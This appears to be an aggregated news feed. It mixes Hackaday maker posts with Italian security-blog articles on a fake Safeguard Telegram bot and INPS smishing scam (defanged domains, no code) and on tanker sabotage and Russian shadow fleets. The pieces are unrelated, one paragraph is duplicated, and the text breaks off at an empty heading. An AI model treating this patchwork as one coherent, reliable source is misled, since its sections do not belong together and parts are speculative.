The toaster is a somewhat modest appliance that is often ignored until it stops working. Many cheap examples are not made to be easily repaired, but [Kasey Hou] designed a repairable flat pack toaster.

[Hou] originally planned to design a repairable toaster to help people more easily form an emotional attachment with the device, but found the process of disassembly for existing toasters to be so painful that she wanted to go a step further. By inviting the toaster owner into the process of assembling the appliance, [Hou] reasoned people would be less likely to throw it out as well as more confident to repair it since they’d already seen its inner workings.

Under the time constraints of the project, the final toaster has a simpler mechanism for ejecting toast than most commercial models, but still manages to get the job done. It even passed the UK Portable Appliance Test! I’m not sure if she’d read the IKEA Effect before running this project, but her results with user testing also proved that people were more comfortable working on the toaster after assembling it.

It turns out that Wikipedia couldn’t tell you who invented the toaster for a while, and if you have an expensive toaster, it might still be a pain to repair.

hackaday.com/2025/03/02/flat-p…

Last year, Nintendo has released the Alarmo, a bedside-style alarm clock with a colourful display. Do you own one? You deserve full control over your device, of course. [KernelEquinox] has been reverse-engineering an Alarmo ever since getting one, and there’s no shortage of cool stuff you’ll be able to do with an Alarmo thanks to this work.

Now, just how can you improve upon the Alarmo? Looking through the Alarmo dev community site and threads on the subreddit, there are plenty of ideas, from themes to a ton of possible behaviour tweaks! In particular, Nintendo has already changed Alarmo’s behaviour in a way that is jarring to some users – a third-party development community will help us all make sure our Alarmos work exactly like we expect them to. Want to replace the sound files, tie your Alarmo into your smart home setup, write your apps, tweak the UI or default behaviour, fix a bug that irks you real bad, or access a debug menu? Or, ensure that Alarmo doesn’t contribute to light pollution in your room? All appears to be doable.

Like the Alarmo, but don’t own one yet? They’re limited-release for now, but it will be more widely available this March; we thank [KernelEquinox] for the work in making Alarmo hacker-friendly. If you’ve forgotten, this project started off thanks to the efforts of [Gary] last year. We covered it back then — cat pictures included!

hackaday.com/2025/03/02/making…

It’s been quite a week for asteroid 2024 YR4, which looked like it was going to live up to its “city killer” moniker only to be demoted to a fraction of a percent risk of hitting us when it swings by our neighborhood in 2032. After being discovered at the end of 2024, the 55-meter space rock first popped up on the (figurative) radar a few weeks back as a potential risk to our home planet, with estimates of a direct strike steadily increasing as more data was gathered by professional and amateur astronomers alike. The James Webb Space Telescope even got in on the action, with four precious hours of “director’s discretionary” observation time dedicated to characterizing the size and shape of the asteroid before it gets too far from Earth. The result of all this stargazing is that 2024 YR4 is now at a Level 1 on the Torino Scale of NEO collision risk, with a likely downgrade to 0 by the time the asteroid next swings through again in 2028. So, if like us you were into the whole “Fiery Space Rock 2032” thing, you’ll just have to find something else to look forward to.

On the other hand, if you’re going to go out in a fiery cataclysm, going out as a trillionaire wouldn’t be a bad way to go. One lucky Citibank customer could have done that if only an asteroid had hit during the several hours it took to correct an $81 trillion credit to their account back in April, a mistake that only seems to be coming to light now. You’d think a mistake 80% the size of the global economy would have caused an overflow error somewhere along the way, or that somebody would see all those digits and think something was hinky, but apparently not since it was only the third person assigned to review the transaction that caught it. The transaction, which falls into the “near-miss” category, was reversed before any countries were purchased or fleets of space yachts were commissioned, which seems a pity but also points out the alarming fact that this happens often enough that banks have a “near-miss” category — kind of like a Broken Arrow.

We all know that near-Earth space is getting crowded, with everyone and his brother launching satellite megaconstellations to monetize our collective dopamine addiction. But it looks like things are even starting to get crowded around the Moon, at least judging by this lunar photobomb. The images were captured by the Lunar Reconnaisance Orbiter, which has been orbiting the Moon and studying the landscape for the last 16 years but stretched its capabilities a bit to capture images of the South Korean Danuri. The two probes are in parallel orbits but opposite directions and about 8 kilometers apart at the time, meaning the relative velocity between the two was an unreasonably fast 11,500 km/h. The result is a blurred streak against the lunar surface, which isn’t all that much to look at but is still quite an accomplishment. It’s not the first time these two probes have played peek-a-boo with each other; back in 2023, Danuri took a similar picture when LRO was 18 kilometers below it.

We don’t do much air travel, but here’s a tip: if you want to endear yourself to fellow travelers, it might be best to avoid setting up a phone hotspot named “I Have a Bomb.” That happened last week on American Airlines flight 2863 from Austin, Texas to Charlotte, North Carolina, with predictably results. The prank was noticed while the flight was boarding, causing law enforcement officers to board the plane and ask the prankster to own up to it. Nobody volunteered, so everyone had to deplane and go back through screening, resulting in a four-hour delay and everyone missing their connections. We’re all for fun SSIDs, mind you, but there’s a time and a place for everything.

And finally, we wanted to share this fantastic piece from Brian Potter over at Construction Physics on “Why it’s so hard to build a jet engine.” The answer might seem obvious — because it’s a jet engine, duh — but the article is a fascinating look at the entire history of jet propulsion, from their near-simultaneous invention by the principal belligerents at the end of World War II right through to their modern incarnations. The article is an exploration into the engineering of complex systems, and shows how non-obvious the problems were that needed to be solved to make jet engines practical. It’s also a lesson in the difficulties of turning a military solution into a practical commercial product. Enjoy!

hackaday.com/2025/03/02/hackad…

What is a sensory weaver? [Curiosiate] tells us: “A device which takes sensory data feeds in and converts it in various ways on the body as information streams as though a native sensory input.” As an example, they’ve built one.

This one, called “MK2 Lockpick” is a wrist-mounted array of linear actuators, with a lengthy design/build log to peek into. We don’t get PCB files (blame EasyEDA’s sharing), but we do at least get a schematic and more than enough pictures for anyone interested to reproduce the concept – the levels of bespoke-ness here warrant a new PCB for any newcomers to sensory weaver building, anyway. We also get a story of a proof-of-concept thermal input sensory weaver. The team even includes a lessons learned da, and plenty of inspiration throughout the posts on the blog.

This kind of tech is getting more and more popular, and we are sure there will be more to come — especially as we keep getting cool new gadgets like linear actuators in form of replacement parts. For instance, the actuators in this sensory weaver are harvested from Samsung S23 smartphones, and you could probably find suitable ones as iPhone replacement parts, too. Looking to start out in this area but want a quick build? Look no further than the venerable compass belt.

hackaday.com/2025/03/02/on-sen…

Perfectly clear ice spheres are nifty but can be a bit tricky to make without an apparatus. [Seth Robinson] crafted a copper ice press to make his own.

Copper is well-known for its thermal conductivity, making it a perfect material for building a press to melt ice into a given shape. Like many projects, a combination of techniques yields the best result, and in this case we get to see 3d printing, sand casting, lost PLA casting, lathe turning, milling, and even some good old-fashioned sanding.

The most tedious part of the process appears to be dip coating of ceramic for the lost PLA mold, but the finished result is certainly worth it. That’s not to say that any of the process looks easy if you are a metal working novice. Taking over a week to slowly build up the layers feels a bit excruciating, especially compared to 3D printing the original plastic piece. If you’re ever feeling discouraged watching someone else’s awesome projects, you might want to stick around to the end when [Robinson] shows us his first ever casting. We’d say his skill has improved immensely over time.

If you’re looking for something else to do with casting copper alloys, be sure to checkout this bronze river table or [Robinson’s] copper levitation sphere.

Thanks to [DjBiohazard] for the tip!

youtube.com/embed/vXC_rSEwnGI?…

hackaday.com/2025/03/02/make-i…

Safeguard è un noto servizio, concepito per garantire la sicurezza delle transazioni nel mercato delle criptovalute, accessibile tramite la piattaforma di messaggistica Telegram.

Tuttavia, la sua recente popolarità ha attirato l’attenzione dei criminali informatici, che stanno creando bot fraudolenti su Telegram per ingannare le vittime portando all’installazione di malware o al furto dell’accesso ai loro account.

Una recente analisi ha rivelato l’esistenza di un falso bot di Safeguard che, una volta avviato, richiede all’utente di seguire tre passaggi come ulteriore verifica. L’obiettivo di questa truffa è eseguire codice PowerShell, sfruttando una tecnica già osservata per diffondere il malware Lumma Stealer.

In questi giorni il CERT-AGID ha avuto evidenza di un dominio, di recente registrazione, denominato safeguard-telegram. Questa pagina è collegata a due bot Telegram attualmente attivi, il cui obiettivo è indurre le vittime a scansionare un QR code per abilitare l’accesso da un nuovo dispositivo. In questo modo, la vittima concede ai criminali l’accesso al proprio account.

Il collegamento con lo smishing INPS

Il dominio in questione espone pubblicamente alcune pagine contenenti informazioni sulla configurazione, tra cui il vero indirizzo IP del server che ospita il servizio di truffa.

L’indirizzo IP riportato nel file XML, accessibile tramite browser, risulta, secondo Virustotal, collegato a due domini: inps[.]ec e inps[.]io quest’ultimo già rilevato ed analizzato nel recente comunicato.

La conferma del collegamento arriva visitando direttamente l’indirizzo IP, dove la pagina presenta contenuti e il logo di INPS usati per la truffa.

Un ulteriore dettaglio interessante riguarda i link presenti nel menu superiore, che rimandano tutti a un altro dominio inps[.]st, anche questo risulta essere stato registrato di recente.

Conclusioni

La truffa Safeguard e il collegamento alla truffa INPS mettono in luce come questo gruppo di criminali informatici stia sfruttando contemporaneamente due tipologie distinte di frodi per ottenere accesso alle informazioni delle vittime. Nel primo caso, attraverso bot fraudolenti, cercano di ottenere l’accesso agli account Telegram, mentre nel secondo caso mirano al furto di documenti d’identità tramite campagne di smishing.

Indicatori di Compromissione

Gli IoC relativi a questa campagna sono stati già condivisi con le organizzazioni accreditate al flusso IoC del CERT-AGID.

Link: Download IoC

L'articolo Truffa e smishing che impersona l’INPS: il falso Safeguard ruba dati e installa malware proviene da il blog della sicurezza informatica.

Pour one out for yet another device conquered. This one’s a desk phone for conferences and whatnot, a colour display, a numpad, and a bog standard handset with a speaker and mic. Naturally, also running Linux. You know what to expect – [Parker Reed] has brought Doom to it, and you’d be surprised how playable it looks!

This is the second time a CaptionCall device has graced our pages running Doom — CaptionCall patched out the previous route, but with some firmware dumping and hashcat, root has been acquired once again. [Parker] has upgraded this impromptu gaming setup, too – now, all the buttons are mapped into Doom-compatible keyboard events coming from a single input device, thanks to a C program and an Xorg config snippet. Feel free to yoink for your own Doom adventures or just general CaptionCall hacking!

If you’re interested in the hacking journey, get into the exploitee.rs Discord server and follow the hack timeline from password recovery, start to finish, to Doom, to the state of affairs shown in the video. Now, as the CPU speeds have risen, should the hackerdom switch away from Doom as the go-to? Our community remains divided.

youtube.com/embed/t5-X1oKxfK0?…

hackaday.com/2025/03/02/a-capt…

Nella notte tra il 14 e il 15 febbraio la nave SeaJewel (imo:IMO 9388807) sotto bandiera maltese, ha subito un sabotaggio sotto la linea di galleggiamento mentre era ormeggiata al campo di boe del porto di Vado Ligure (Savona). Il danneggiamento sullo scafo – una falla di oltre un metro e mezzo come riporta la stampa – sembra essere stato provocato da due esplosioni ritardate e separate (20 minuti) tramite esplosivo caricato dall’esterno. Insieme alla Seajewel risultava presente anche la Seacharm (IMO:9773765), sotto bandiera Marshall Islands. La Seacharm proveniva dalla Libia e a sua volta aveva subito un sabotaggio al largo del porto turco di Cheyan tra il 18 e il 19 gennaio.

I due incidenti – in tempi ravvicinati – che sollevano la questione se la società Thenamaris – quale gestore delle due navi e al 2022 collegata agli interessi del CEO Nikolas Martinos – sia stata presa di mira, coinvolgono mezzi che recentemente hanno fatto scalo in Russia, nel terminal di Novorossiysk, continuando a traportare petrolio russo nonostante le sanzioni legate alla guerra in Ucraina. L’UE ha, infatti, chiuso i suoi porti ad oltre 2.800 navi dell’intera flotta mercantile russa e messo al bando ‘il trasporto marittimo di petrolio greggio russo verso paesi terzi’ . Il divieto, tuttavia, non si applica se il petrolio greggio o i prodotti petroliferi sono acquistati a un prezzo pari o inferiore al tetto sui prezzi del petrolio.

La Seajewel ha caricato merci russe almeno tre volte nel 2024 (a febbraio, marzo e maggio) ed è stata avvistata mentre scaricava nel porto di Constanța – parliamo anche di questo dopo – dopo essere arrivata dal porto di Ceyhan. Altre due navi hanno subito sabotaggi in mare. Cosa sta succedendo?
Fonte immagine: Vessel Finder, Seajewel Fonte immagine: Vessel Finder, Sea Charm
Molti di noi sono abituati a vedere il mare, con i suoi bei tramonti, come pura funzione illustrativa, tuttavia il nostro Federico Fellini sapeva bene che il mare non solo può riempire un’intera struttura narrativa, ma che – come riporta Roberto Nepoti in ‘Fellini e il mare’ – sul mare avvengono nefandezze, “il mare (vd. La Nave va) e è il teatro dell’apocalittico finale (otto minuti e mezzo), dove l’attentato di un giovane serbo a un incrociatore austro-ungarico produce in risposta il cannoneggiamento della nave, ponendosi come metafora dello scoppio (siamo nel 1913) della Grande Guerra”.

“It doesn’t matter if a cat is black or yellow, as long as it catches mice”. _ Deng Xiaoping

Il mare come terra, aria, spazio e cyber occupa il suo posto d’onore nella guerra ibrida e coinvolge tutti gli attori in gioco. Ed in questo gioco occupa uno spazio anche la propaganda anche dell’underground. Difficile e complesso comprendere chi ne stia beneficiando, ma ricordiamoci che se i gatti nella prima guerra mondiale hanno aiutato i soldati a tenere le trincee libere dai roditori, la metafora occidentale in Oriente, più precisamente secondo Deng Xiaoping, pioniere della riforma economica in Cina – viene letta tutta in un altro modo: il topo è la prosperità dell’intera società, il gatto – stato confuciano in Oriente – è il modo per ottenerla. Chi è il gatto in Occidente?

IN BREVE:

• Sabotaggi tra petroliere, navi militari e cavi sottomarini
• Telecomunicazioni, cavi sottomarini, spionaggio e pedinamenti
• ‘Waterworld’: le tensioni per il predominio marittimo ed energetico
• “Flotte ombra” e il così detto prezzo massimo di 60 dollari al barile
• Caratteristiche e tendenze specifiche delle navi ombra
• La posizione strategica dell’Italia
• Difficili da arrestare
• I sabotaggi di Seajewel, Seacharm, Grace Ferrum e Suezmax, guerra commerciale o “controlli più rigorosi”?
• La grande vendita di navi greche allo scoppio del conflitto russo-ucraino
• Cui prodest
• Bibliografia

Immagine: NoName e DdoS ai porti italiani, 17 e 20 febbraio 2025 oltre che ai trasporti pubblici.

Sabotaggi tra petroliere, navi militari e cavi sottomarini

La notizia del sabotaggio in mare italiano – avvenuto dopo quelli analoghi della Grace Ferrum (IMO: 9667928) gestita dalla compagnia Cymare, al largo della costa libica all’inizio di febbraio e della Suezmax (IMO: 9234642) nel porto baltico russo di Ust-Luga e quello di dicembre della nave cargo Ursa Major (IMO:9538892) sanzionata (2022 USA e 2023 UK) gestita dalla società russa Oboronlogistika e parte delle operazioni di costruzione militare del Ministero della Difesa russo (affondata nel mediterraneo, ultimo segnale AIS 23 dicembre ore 00:14), o l’incidente subito dalla Koala (IMO:9234642) del 9 febbraio sempre al terminal Ust-Luga – desta non poche preoccupazioni. La Koala gestita dalla cipriota Lagosmarine, mentre il proprietario nominale risulta un cittadino greco ha come vero proprietario il cittadino lettone Alexey Khalyavin, le cui società sono tra le maggiori acquirenti di petrolio russo aggirando il tetto massimo dei prezzi. Ad accusare Lagosmarine – inclusa nell’elenco delle sanzioni americane come parte della flotta ombra russa – di trasportare petrolio iraniano nell’interesse del Corpo delle guardie rivoluzionarie islamiche e del gruppo sciita filo-iraniano Hezbollah, è stato Israele.

Dietro ai sabotaggi si troverebbe un disegno ben organizzato – che ci ricorda la prima guerra mondiale o quella ispano-americana – si relaziona non solo con le navi che hanno fatto scalo recentemente nei porti russi ma che si estende al sabotaggio dei cavi elettrici e sottomarini in un panorama geopolitico sempre più teso, non ultimo quello del Mar Baltico (Estlink 2), che avrebbe coinvolto la petroliera russa Eagle S (IMO:9329760) che le autorità finlandesi hanno descritto come parte della “flotta ombra” di Mosca, quello che ha invece coinvolto la Yi Peng 3 (IMO:9224984) e i cavi sottomarini nel Mar Rosso, tra Gedda, in Arabia Saudita, e Gibuti, nell’Africa orientale.

Ovviamente tutti questi casi non sono una coincidenza anche se bisogna dire che gli incidenti ai cavi sottomarini, potrebbero essere sì intenzionali, ma conseguenza di attrezzature impigliate, cosa meno eccitante ma reale. Infatti per scoraggiare questo comportamento, viene ripagata l’attrezzatura da parte degli operatori per evitare le manomissioni. Caso che non si può applicare invece al sabotaggio del Nord Stream, all’attacco dell’oleodotto Niger Blend – dopo un avvertimento emesso dal Patriotic Liberation Front (FPL) – e il seguente incidente al Balticonnector accidentalmente danneggiato da una nave cinese, ma si sa i cinesi non sono grandi navigatori).

Altro sabotaggio quello relativo invece alla nave militare tedesca Hessen – progettata per contrastare gli attacchi aerei e che ha contribuito a proteggere le navi nel Mar Rosso contro gli Houthi – che ha subito un tentativo di contaminazione del sistema idrico con decine di litri di olio esausto e alla cui indagine partecipa il BAMAD, controspionaggio che conduce anche operazioni ibride, soprattutto nel campo della difesa informatica.

Se poi si aggiunge che dall’inizio di gennaio l’Areonautica italiana – e successivamente dalla Guardia di Finanza e la Marina degli Stati Uniti a metà febbraio – hanno iniziato (vd. Italmilradar) a monitorare il passaggio del sottomarino russo Krasnodar B-265 (accanto al quale ha navigato il rimorchiatore il Churov per dirigersi al largo della costa di Sollum, in Egitto) e l’area della sua navigazione (tra la Sardegna e l’Algeria), la situazione si complica parecchio in materia di sicurezza marittima e diritto internazionale, evidenziando estreme tensioni e sfide strategiche di cui l’Europa, ma soprattutto l’Italia, che bagna con disagio il suo stivale in un’area di primaria importanza per le relazioni esterne in un’invidiabile posizione tra lo stretto della Sicilia e quello di Otranto, che conducono dall’Indo-Pacifico attraverso Suez al cuore iperproduttivo dell’Europa, e le posizioni dei porti di Genova e Trieste di accesso alle spedizioni verso l’area dell’Europa centrale, punti ai quali arrivano le importazioni di materie prime estere e le cui rotte sono garantite dalla ‘supremazia navale’ degli Stati Uniti. La lista non finisce qui.

Anche il cavo sottomarino di Rostelecom sarebbe stato danneggiato, la dichiarazione- che segue alle accuse alla russa Eagle S – è stata fatta l’8 di febbraio e ha fatto risalire l’incidente ad almeno un mese prima.

Ovviamente la per il predominio tra Occidente e Cina minaccia l’equità digitale e la sicurezza dei cavi sottomarini: se l’americana SubCom, la giapponese NEC Corporation e la francese Alcatel Submarine Networks, hanno storicamente dominato la posa dei cavi sottomarini in fibra ottica, ora la Cina è entrata potentemente nel mercato.

Telecomunicazioni, cavi sottomarini, spionaggio e pedinamenti

Una nota: i cavi sottomarini – che si traducono in miliardi di dollari di produttività e informazioni – possono essere altamente vulnerabili a una serie di fattori, non solo ad incidenti fisici. Un’ancora gettate nel posto sbagliato può fare grandi danni, ma si pensa poco ai danni relativi all’hacking e alla raccolta di informazioni di intelligence. In questi cavi – con l’aiuto dei sottomarini – possono essere praticate piccole fessure per inserire dispositivi di ascolto e raccolta dati: attraverso i cavi si possono rintracciare telefonate, e-mail, transazioni finanziarie e la crittografia che li protegge può essere violata. Lo fecero gli USA durante la guerra fredda come parte dell’Operazione Ivy Bells, lo fece l’agenzia inglese GCHQ nel 2013 e nel 2015 furono intercettati dei sottomarini russi vicino ai cavi. Non ultime le accuse del National Computer Virus Emergency Response Center cinese nel report “Lie To Me” che ha per oggetto l’operazione Volt Thypoon e che accusa gli USA di operazioni di monitoraggio dei cavi in ​​fibra ottica sottomarini istituite e gestite dalla NSA (tra cui il progetto UpStream) che convertirebbe e tradurrebbe il traffico di trasmissione nel cavo in fibra ottica sottomarino in informazioni di intelligence leggibili e recuperabili in tempo reale.

Si ricorda inoltre che nel 2020 gli Stati Uniti hanno impedito il progetto di Google e Facebook di un cavo sottomarino che collegasse gli Stati Uniti e Hong Kong.

Oggetto delle più recenti attività marittime è stata la nave di sorveglianza russa Yantar, nave che è stata seguita dalla HMS Somerset della Royal Navy il 22 gennaio 2025 e vicino alla quale e stato ordinato di fare emergere un sottomarino, a causa della posizione strategica in cui navigava, ovvero su infrastrutture sottomarine critiche nella zona economica esclusiva (ZEE) del Regno Unito.

Una nota: i cavi sottomarini – che si traducono in miliardi di dollari di produttività e informazioni – possono essere altamente vulnerabili a una serie di fattori, non solo ad incidenti fisici. Un’ancora gettate nel posto sbagliato può fare grandi danni, ma si pensa poco ai danni relativi all’hacking e alla raccolta di informazioni di intelligence. In questi cavi – con l’aiuto dei sottomarini – possono essere praticate piccole fessure per inserire dispositivi di ascolto e raccolta dati: attraverso i cavi si possono rintracciare telefonate, e-mail, transazioni finanziarie e la crittografia che li protegge può essere violata. Lo fecero gli USA durante la guerra fredda come parte dell’Operazione Ivy Bells, lo fece l’agenzia inglese GCHQ nel 2013 e nel 2015 furono intercettati dei sottomarini russi vicino ai cavi. Non ultime le accuse del National Computer Virus Emergency Response Center cinese nel report “Lie To Me” che ha per oggetto l’operazione Volt Thypoon e che accusa gli USA di operazioni di monitoraggio dei cavi in ​​fibra ottica sottomarini istituite e gestite dalla NSA (tra cui il progetto UpStream) che convertirebbe e tradurrebbe il traffico di trasmissione nel cavo in fibra ottica sottomarino in informazioni di intelligence leggibili e recuperabili in tempo reale.

‘Waterworld’: alcune tensioni per il predominio marittimo ed energetico

E’ necessario prima di tutto chiarire che nei mari globali le tensioni rimangono elevate e coinvolgono diverse nazioni, non ultime in questi giorni la Cina e l’Australia in materia di esercitazioni navali controllate. Ogni anno, i confini marittimi diventano un punto sempre caldo tenendoci con il fiato sospeso nel dubbio che queste tensioni possano alimentare una una crisi marittima più ampia.

Queste dispute sono vissute recentemente anche all’interno dei confini europei:

• tensioni Turchia-Grecia e Cipro, in gran parte pacifiche ma in attesa di risoluzione completa e al 61mo round di colloqui.
• ruoli e interessi dell’UE e degli USA nel Mediterraneo orientale (punto caldo e ponte per il commercio tra Europa e Asia.
• competizione energetica e controversie nel Mediterraneo orientale che coinvolgono: Turchia, Grecia e Cipro, ma coinvolge anche Egitto, Libia, Israele, Italia, Francia e Germania. (Dobbiamo qui ricordare che la Turchia con l’ambizione di Hub energetico per l’Europa ed esclusa dai piani (2021) di Cipro, Egitto, Israele e Grecia di realizzare un gasdotto verso l’Europa, ha sempre più adottato azioni unilaterali, provocando risposte da Grecia e Francia).

A ciò si aggiungono le recenti scoperte di gas naturale al largo della Libia: nel dicembre 2019, la Turchia ha firmato un accordo di delimitazione marittima con il governo libico riconosciuto dall’ONU e ha anche inviato consiglieri militari per aiutare il governo di Tripoli nella sua lotta con gli avversari nella Libia orientale, sostenuta da Egitto ed Emirati Arabi Uniti. Se Israele, Egitto, Grecia e altri membri dell’UE temono che le azioni della Turchia possano minare il gasdotto EastMed (che esporterebbe gas israeliano e cipriota in Grecia e poi in Europa, che ha suscitato anche critiche da parte degli attivisti verdi, come anche Extinction Rebellion che spinge per una più rapida eliminazione dei combustibili fossili), vi è stato anche un rafforzamento della cooperazione (e settore militare) Haftar/Russia, punto di forza per la Russia per gestire la propria presenza in Cirenaica e zona del Sahel. Questo complica l’attuazione del piano Mattei italiano soprattutto la ricerca di alternative dell’Europa al gas russo che incontra gli interessi di Grecia, Cipro, Israele, Egitto e Turchia che invece guarda ad un vecchio piano per trasportare gas del Qatar in Europa attraverso Arabia Saudita, Giordania, Siria e Turchia.

Come si osserva la situazione è molto complessa e vede numerosi attori in gioco statali e non.
Fonte immagine: Depa International Projects
A ció possiamo ancora accostare la cosiddetta rinascita degli Stati Uniti, che dopo avere eroso la sua posizione nel Mediterraneo orientale con la normalizzazione regionale tra Israele e i paesi arabi (2022) e la mediazione dell’accordo di delimitazione marittima tra Israele e Libano, ha aumentato i suoi dispiegamenti come deterrenza, allo scoppio della geurra russa-ucraina (minaccia NATO) e israelo-palestinese (minaccia Iran) e alla ‘crescita’ dell’influenza cinese, obiettivo NATO evidenziato a Madrid.

“Flotte ombra” e il così detto prezzo massimo di 60 dollari al barile

Se ancora non sono chiare le intenzioni del sottomarino russo Krasnodar B-265, tra dimostrazioni o normale operatività nel Mediterraneo e quali siano i porti sicuri che si sia assicurato per rifornirsi, sembrano diventare sempre più evidenti le relazioni tra la navi che hanno subito recenti incidenti o manomissioni, collegate a flotte che hanno il preciso obiettivo di aggirare le sanzioni economiche in corso e operare così in una zona grigia per il trasporto di materie prime energetiche. Tuttavia queste imbarcazioni non trasportano solo petrolio russo, ma in passato sono stati frequenti i casi di coinvolgimento nel trasporto di petrolio venezuelano e iraniano o di trasporto di petrolio verso la Nord Corea, nonostante le sanzioni internazionali. La loro presenza nel Mar Mediterraneo, compresa l’Italia, è stata sempre più notata negli ultimi anni. Il Mediterraneo è infatti zona strategica per il trasporto di petrolio a causa della sua vicinanza alle principali regioni produttrici come Nord Africa e Medio Oriente e alle principali rotte di navigazione che collegano Europa, Asia e Africa. Sebbene l’Italia non rappresenti in sé non sia un importante hub per le loro attività ci sono stati casi di petroliere che hanno attraccato nei suoi porti o operato nelle acque italiane, utilizzando documentazione falsa o dichiarando erroneamente il loro carico per evitare controlli. A queste dovremmo aggiungere le famose navi dei veleni che – dagli anni ‘70 – hanno partecipato alladispersione illegale di rifiuti tossici nei nostri mari Ionio e Adriatico dietro uno schema ben preciso di affondamenti. Ma questa é un’altra interessante storia.

Fonte immagine: Nautica Report, Le navi dei veleni: più di trenta le navi affondate nei fondali.

Le vendite di petrolio russo secondo quanto evidenziato da Andriy Klymenko, capo del gruppo di monitoraggio del Black Sea Institute for Strategic Studies, non sono diminuite a causa delle sanzioni dell’Unione Europea, ma “in seguito agli attacchi con droni a lungo raggio delle forze armate ucraine sul principale porto di esportazione russo di Ust’-Luga”. Questo ha portato le navi ad utilizzare un altro porto ‘Primorsk’, nella regione di San Pietroburgo”. Tuttavia Klymenco ha fatto notare che “un terzo del volume di petrolio greggio russo proveniente dai porti del Mar Baltico viene trasportato in tutto il mondo da petroliere provenienti dai paesi dell’UE e della NATO. Naturalmente non lo trasportano in Europa, ma in India, Turchia e Cina. Conosciamo ogni petroliera, i suoi proprietari, fino all’indirizzo dell’ufficio dell’armatore. Si tratta di cinque note aziende greche, di proprietà di miliardari greci”. Dopo le compagnie greche ci sono quelle della Federazione russa, e altre registrate negli Emirati Arabi Uniti, a Dubai. “Non è un segreto che 1.500 aziende russe abbiano nuovamente registrato la propria sede a Dubai”. Poi ci sono le navi registrate in Azerbaigian: “14 petroliere appartenevano a società registrate in questo paese, 9 in Cina, principalmente a Hong Kong, 9 in India, 8 in Turchia, 3 in Vietnam e 1 in Kazakistan”.

Azerbaigian, Cina, Turchia, Vietnam, Kazakistan possiedono molte navi che hanno più di 15 anni, se uscisse un regolamento che stabilisse che non possono essere più usate, “queste uscirebbero immediatamente dal gioco”.

Sempre secondo Klymenko solo una petroliera su 96 potrebbe essere considerata una petroliera della “flotta fantasma”, perché era immatricolata in uno dei cosiddetti paesi con “bandiera di comodo”. “Si tratta semplicemente di giurisdizioni offshore. In genere ce ne sono da 6 a 9 su 100”. Molte non vengono registrate insieme ai volumi reali secondo Klymenco “gli occidentali utilizzano l’intelligenza artificiale, per elaborare tutte le informazioni,[…] probabilmente sono ancora in tempi di pace, non tengono conto dell’impatto della guerra elettronica russa sulle prestazioni di questi sistemi di informazione marittima, perché distorce i segnali o li nasconde”. Poi ci sono anche i casi in cui l’equipaggio della petroliera disattiva il sistema di allerta precoce, impedendo così la registrazione del porto di partenza. Infine per Klymenko non esistono sanzioni sul petrolio e sui prodotti petroliferi russi. “C’è un embargo: i paesi da cui arrivano le sanzioni semplicemente si rifiutano di acquistare petrolio oltre al tetto massimo, un formato impossibile da rispettare, perchè non esiste alcun meccanismo di verifica. L’India, ad esempio, non ha promesso nulla a nessuno.

Caratteristiche e tendenze specifiche delle navi ombra

Per eludere sanzioni, regolamenti e controlli le ‘flotte ombra’ sono solitamente coinvolte nel trasporto di petrolio o altre materie prime per vari paesi e si distinguono dalle petroliere convenzionali per una serie di caratteristiche e tendenze specifiche tra cui:

• la data della costruzione (15 anni o anche più), spesso anche caratterizzate da una cattiva manutenzione,
• la proprietà offuscata o anonima (utilizzo dei “registri aperti”, che consentono alle navi di essere registrate in paesi senza alcun collegamento con il proprietario o il suo paese di origine,
• stesso numero IMO ma nome modificato (cambio di nome o di registrazione frequente),
• oscuramento IMO,
• bandiere di comodo e cambio frequente di bandiera (es.Panama, Malta, Liberia, Comore, Isole Marshall), che rappresentano il 40% della capacità di trasporto mondiale.
• navigazione di rotte di spedizione complesse,
• l’elusione o la manipolazione dei segnali di identificazione automatica (AIS) per evitare o rendere complesso il tracciamento e il monitoraggio (spegnimento del segnale gps prima di attraccare al porto),
• utilizzo di trasferimenti nave/nave (STS) – es. petrolio tra navi – per oscurare la destinazione del carico,
• navigazione con rotte insolite o complesse per rendere difficile l’individuazione
• possibile mancanza di assicurazione,
• transazioni non trasparenti dei pagamenti del carico,
• documenti di carico falsi o manipolati per mascherare origine o destinazione del carico.

Inoltre il numero IMO (univoco e di 7 cifre) di una nave – e collegato in modo visibile al suo scafo – è destinato a essere permanente indipendentemente da un cambio di proprietà o nome della nave ed è separato e diverso dal numero ufficiale rilasciato dall’amministrazione di bandiera della nave che è utilizzato solo internamente: le navi ‘ombra’ hanno spesso dipinto sopra i nomi delle navi e i numeri IMO per oscurare la propria identità e spacciarsi per navi diverse.

Fonte immagine: Clarksons Tanker Register, 2023., le dimensioni della flotta di petroliere al 2023.

Bisogna notare inoltre che i tre stati di bandiera più grandi per tonnellate di portata lorda sono: Liberia, Isole Marshall e Panama e tutti e tre hanno tutti un’affiliazione storica con gli Stati Uniti e hanno un patto di condivisione delle informazioni se sospettano che una petroliera stia partecipando al commercio di petrolio sanzionato per impedire a queste petroliere di fare “flag shopping”. Secondo un report del 2024 del Congressional Reserve Service “I registri di Liberia, Isole Marshall, Panama, Bahamas e Honduras sono le uniche navi battenti bandiera straniera che ricevono un’idoneità speciale per la copertura assicurativa contro i rischi di guerra fornita dal governo degli Stati Uniti”. Bandiere invece come quelle di Gabon, Palau e le Isole Cook, sono state spesso sanzionate per cui vengono il più delle volte evitate. La scelta tocca poi le transazioni delle “banche che scambiano i fondi tra gli acquirenti e i venditori di petrolio, le banche infatti devono confermare che la nave soddisfi gli standard di classificazione”.

Fonte immagine: Marine Traffic

Molte delle navi sanzionate vengono inserite in liste grigie a causa di irregolarità per: problemi al motore, agli ammortizzatori, al cruscotto, a taluni equipaggiamenti, ect. Se queste irregolarità si sommano invece finiscono nelle liste nere, ovvero di petroliere che necessitano il più delle volte di riparazioni immediate.

La posizione strategica dell’Italia

La posizione strategica dell’Italia, al centro del Mediterraneo, la rende un punto di transito chiave per le spedizioni di petrolio in Europa, Nord Africa e Medio Oriente e inoltre è relativamente vicina a Paesi come Libia (punto caldo di commercio illegale), Siria e Iran (in particolare trasferimenti STS), che sono spesso coinvolti in operazioni di flotta oscura a causa delle sanzioni internazionali. La domanda di petrolio a basso costo è una delle origini del mercato delle flotte ombra e la natura segreta ed evasiva di queste operazioni rende difficile sradicarle. L’Italia collabora strettamente con l’Unione Europea e la NATO per monitorare e contrastare l’attività della Dark Fleet nel Mediterraneo e ciò include la condivisione di intelligence e la conduzione di pattugliamenti congiunti. Nel 2020, ad esempio, una petroliera che trasportava petrolio libico è stata trattenuta in Sicilia con l’accusa di aver violato le sanzioni dell’UE.

Difficili da arrestare

